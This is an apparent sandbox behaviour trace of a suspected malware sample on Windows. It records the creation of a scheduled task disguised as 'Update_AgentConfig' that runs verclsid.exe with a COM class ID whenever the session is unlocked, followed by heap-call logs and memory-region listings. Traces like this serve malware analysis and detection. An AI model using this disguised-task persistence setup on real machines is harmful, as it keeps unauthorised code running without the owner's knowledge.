[0379.350] ITaskFolder:RegisterTask (in: This=0x38df70, Path="\\Update_AgentConfig_kEecfMwgj", XmlText=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", flags=6, UserId=0xcca70*(varType=0x8, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x1c), password=0xcca90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d0230, varVal2=0x1d0230), LogonType=0, sddl=0xcca50*(varType=0x0, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x2aa5a0), ppTask=0xcc9d8 | out: ppTask=0xcc9d8*=0x1d7e50) returned 0x0
[0379.622] GetProcessHeap () returned 0x280000
[0379.622] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x20) returned 0x2b3c10
[0379.623] _memicmp (_Buf1=0x29bcf0, _Buf2=0xff261b08, _Size=0x7) returned 0
[0379.623] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x29d500, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0379.623] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0379.623] GetProcessHeap () returned 0x280000
[0379.623] RtlAllocateHeap (HeapHandle=0x280000, Flags=0xc, Size=0x82) returned 0x2b7600
[0379.623] _vsnwprintf (in: _Buffer=0xcccb0, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xcc998 | out: _Buffer="SUCCESS: The scheduled task \"\\Update_AgentConfig_kEecfMwgj\" has successfully been created.\n") returned 91
[0379.623] _fileno (_File=0x7feff862ab0) returned 1
[0379.623] _errno () returned 0x1d4bb0
[0379.623] _get_osfhandle (_FileHandle=1) returned 0x7
[0379.623] _errno () returned 0x1d4bb0
[0379.623] GetFileType (hFile=0x7) returned 0x2
[0379.624] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0379.624] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xcc910 | out: lpMode=0xcc910) returned 1
[0379.625] __iob_func () returned 0x7feff862a80
[0379.625] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0379.625] lstrlenW (lpString="SUCCESS: The scheduled task \"\\Update_AgentConfig_kEecfMwgj\" has successfully been created.\n") returned 91
[0379.625] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xcccb0*, nNumberOfCharsToWrite=0x5b, lpNumberOfCharsWritten=0xcc980, lpReserved=0x0 | out: lpBuffer=0xcccb0*, lpNumberOfCharsWritten=0xcc980*=0x5b) returned 1
[0379.626] IUnknown:Release (This=0x1d7e50) returned 0x0
[0379.626] TaskScheduler:IUnknown:Release (This=0x38df70) returned 0x0
[0379.626] TaskScheduler:IUnknown:Release (This=0x1d7c40) returned 0x1
[0379.626] lstrlenW (lpString="") returned 0
[0379.626] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml") returned 42
[0379.626] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\a.xml", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0379.626] GetProcessHeap () returned 0x280000
[0379.626] GetProcessHeap () returned 0x280000
[0379.626] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c620) returned 1
[0379.626] GetProcessHeap () returned 0x280000
[0379.626] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c620) returned 0x1fc
[0379.627] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c620 | out: hHeap=0x280000) returned 1
[0379.627] GetProcessHeap () returned 0x280000
[0379.627] GetProcessHeap () returned 0x280000
[0379.627] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c5c0) returned 1
[0379.627] GetProcessHeap () returned 0x280000
[0379.627] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c5c0) returned 0x56
[0379.628] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c5c0 | out: hHeap=0x280000) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29d760) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29d760) returned 0x16
[0379.628] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d760 | out: hHeap=0x280000) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29d740) returned 1
[0379.628] GetProcessHeap () returned 0x280000
[0379.628] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29d740) returned 0x18
[0379.628] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d740 | out: hHeap=0x280000) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cf10) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cf10) returned 0x20
[0379.629] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cf10 | out: hHeap=0x280000) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c250) returned 1
[0379.629] GetProcessHeap () returned 0x280000
[0379.629] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c250) returned 0xa0
[0379.630] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c250 | out: hHeap=0x280000) returned 1
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcd0) returned 1
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bcd0) returned 0x18
[0379.630] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcd0 | out: hHeap=0x280000) returned 1
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] GetProcessHeap () returned 0x280000
[0379.630] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd90) returned 1
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cd90) returned 0x20
[0379.631] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd90 | out: hHeap=0x280000) returned 1
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c550) returned 1
[0379.631] GetProcessHeap () returned 0x280000
[0379.631] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c550) returned 0x5a
[0379.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c550 | out: hHeap=0x280000) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c530) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c530) returned 0x18
[0379.632] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c530 | out: hHeap=0x280000) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd30) returned 1
[0379.632] GetProcessHeap () returned 0x280000
[0379.632] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cd30) returned 0x20
[0379.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd30 | out: hHeap=0x280000) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c510) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c510) returned 0xc
[0379.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c510 | out: hHeap=0x280000) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c4f0) returned 1
[0379.633] GetProcessHeap () returned 0x280000
[0379.633] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c4f0) returned 0x18
[0379.633] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c4f0 | out: hHeap=0x280000) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295f90) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295f90) returned 0x20
[0379.634] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295f90 | out: hHeap=0x280000) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29be50) returned 1
[0379.634] GetProcessHeap () returned 0x280000
[0379.634] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29be50) returned 0x208
[0379.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29be50 | out: hHeap=0x280000) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcb0) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bcb0) returned 0x18
[0379.635] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcb0 | out: hHeap=0x280000) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295ea0) returned 1
[0379.635] GetProcessHeap () returned 0x280000
[0379.635] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295ea0) returned 0x20
[0379.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295ea0 | out: hHeap=0x280000) returned 1
[0379.636] GetProcessHeap () returned 0x280000
[0379.636] GetProcessHeap () returned 0x280000
[0379.636] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29d500) returned 1
[0379.636] GetProcessHeap () returned 0x280000
[0379.636] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29d500) returned 0x200
[0379.636] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29d500 | out: hHeap=0x280000) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcf0) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bcf0) returned 0x18
[0379.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bcf0 | out: hHeap=0x280000) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295e10) returned 1
[0379.637] GetProcessHeap () returned 0x280000
[0379.637] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295e10) returned 0x20
[0379.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295e10 | out: hHeap=0x280000) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c460) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c460) returned 0x14
[0379.638] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c460 | out: hHeap=0x280000) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c440) returned 1
[0379.638] GetProcessHeap () returned 0x280000
[0379.638] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c440) returned 0x18
[0379.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c440 | out: hHeap=0x280000) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295d50) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295d50) returned 0x20
[0379.639] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295d50 | out: hHeap=0x280000) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c480) returned 1
[0379.639] GetProcessHeap () returned 0x280000
[0379.639] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c480) returned 0x16
[0379.640] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c480 | out: hHeap=0x280000) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29c300) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29c300) returned 0x18
[0379.640] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29c300 | out: hHeap=0x280000) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295d20) returned 1
[0379.640] GetProcessHeap () returned 0x280000
[0379.640] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295d20) returned 0x20
[0379.641] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295d20 | out: hHeap=0x280000) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc30) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc30) returned 0x2
[0379.641] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc30 | out: hHeap=0x280000) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295b70) returned 1
[0379.641] GetProcessHeap () returned 0x280000
[0379.641] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295b70) returned 0x20
[0379.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295b70 | out: hHeap=0x280000) returned 1
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295ba0) returned 1
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295ba0) returned 0x20
[0379.642] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295ba0 | out: hHeap=0x280000) returned 1
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] GetProcessHeap () returned 0x280000
[0379.642] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295bd0) returned 1
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295bd0) returned 0x20
[0379.643] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295bd0 | out: hHeap=0x280000) returned 1
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c00) returned 1
[0379.643] GetProcessHeap () returned 0x280000
[0379.643] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c00) returned 0x20
[0379.643] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x295c00 | out: hHeap=0x280000) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cdc0) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cdc0) returned 0x20
[0379.644] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29cdc0 | out: hHeap=0x280000) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cdf0) returned 1
[0379.644] GetProcessHeap () returned 0x280000
[0379.644] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cdf0) returned 0x20
[0379.644] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x297f20) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x297f20) returned 0x30
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29ce20) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29ce20) returned 0x20
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x297f60) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x297f60) returned 0x30
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cee0) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cee0) returned 0x20
[0379.645] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2b7600) returned 1
[0379.645] GetProcessHeap () returned 0x280000
[0379.645] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2b7600) returned 0x82
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x2b3c10) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x2b3c10) returned 0x20
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc50) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc50) returned 0x18
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c30) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c30) returned 0x20
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c60) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.646] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c60) returned 0x20
[0379.646] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295c90) returned 1
[0379.646] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295c90) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cc0) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cc0) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc70) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc70) returned 0x18
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295cf0) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295cf0) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295d80) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.647] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295d80) returned 0x20
[0379.647] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295de0) returned 1
[0379.647] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295de0) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295e40) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295e40) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295e70) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295e70) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29cd60) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29cd60) returned 0x20
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc90) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc90) returned 0x18
[0379.648] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x295db0) returned 1
[0379.648] GetProcessHeap () returned 0x280000
[0379.648] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x295db0) returned 0x20
[0379.649] HeapValidate (hHeap=0x280000, dwFlags=0x0, lpMem=0x29bc10) returned 1
[0379.649] GetProcessHeap () returned 0x280000
[0379.649] RtlSizeHeap (HeapHandle=0x280000, Flags=0x0, MemoryPointer=0x29bc10) returned 0x18
[0379.649] exit (_Code=0)
Thread:
id = 102
os_tid = 0x3f4
Process:
id = "14"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x7294a000"
os_pid = "0xd08"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "3"
os_parent_pid = "0x384"
cmd_line = "verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2046
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2047
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2048
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2049
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2050
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2051
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2052
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2053
start_va = 0xffde0000
end_va = 0xffde6fff
monitored = 0
entry_point = 0xffde1b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 2054
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2055
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2056
start_va = 0x7fffffd3000
end_va = 0x7fffffd3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2057
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2058
start_va = 0x250000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2059
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2060
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2061
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2062
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2063
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2064
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
